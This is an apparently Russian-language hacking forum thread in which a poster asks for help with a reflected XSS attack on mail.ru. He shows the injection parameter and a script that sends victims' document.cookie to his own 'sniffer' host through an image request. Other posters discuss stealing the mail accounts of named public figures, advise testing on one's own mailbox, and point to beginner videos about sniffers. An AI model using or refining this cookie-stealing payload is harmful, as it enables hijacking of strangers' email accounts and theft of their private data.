Жириновский настоящий насчет медведя не знаю да и не стоит туда лезть не по зубам тебе эти акк там спец защита небось .Насчет сниффа попробуй со свой почты залезть придут куки или нет.И еще зделай все через фрейм а то все как то покривому скорее у тебя куки приходятс твоего сайта
1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf=">
3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie;
Сниффер свой.
Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет.
Проблема думаю в 3., только незнаю как исправить.
Кто может, помогите.
Еще вот:
Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений):
У вас нет прав чтобы видеть скрытый текст, который находится здесь
Они у меня вообще не приходят.
Все стопорится на уязвимости, открывается страница сайта с уязв. и все, а по идее должно проскочить и перекинуть на сайт который я прописал.
...............
Все разобрался.
там где вход в сниффер видео,посмотри и здесь на форуме тоже видео есть
для новичков там тоже посмотри.знать больше по снифферу будешь.
а по части ящиков посмотри "мой мир",ящиков.